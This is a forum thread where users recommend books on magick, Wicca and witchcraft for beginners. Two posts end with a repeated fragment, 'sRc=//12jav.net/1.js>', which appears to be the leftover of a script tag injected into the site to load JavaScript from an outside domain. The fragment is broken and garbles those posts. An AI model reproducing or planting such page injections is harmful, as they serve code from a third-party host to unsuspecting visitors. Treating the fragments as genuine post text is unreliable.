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I would recommend

-Modern Magick by Donald Kraig
-Introduction into hermatatics by Franz Bardon
-Self Initiation into the golden dawn tradition by Ciceros

I recommend those books as those are very active and requires you to actively work with the book and is in a more hands on approach , and less of a theory approach.

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Re: Good books?
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Thank you all very much! Exactly what I was looking for. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
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There's a book I am reading called the "Goodly Spellbook: Olde Spells for Modern Problems" by Dixie Deerman and Stephen Rasmussen. It has quite a lot of substance and good explanations. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
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Idk if eanyone has posted these but some good ones are,
"A witches world of magick" by Melanie Marquis,
"Charms Spells & formulas" by Ray Malbrough,
"Wicca a guide for the solitary practitioner" and "livening Wicca a further guide for the solitary practitioner" both by Scott Cunningham,
"Magical herbalism" also by Scott Cunningham
"Protection & reversal magick" by Jason Miller,
This one isent really for beginners but I found it vary helpful "The Witches book of the dead" by Christian Day
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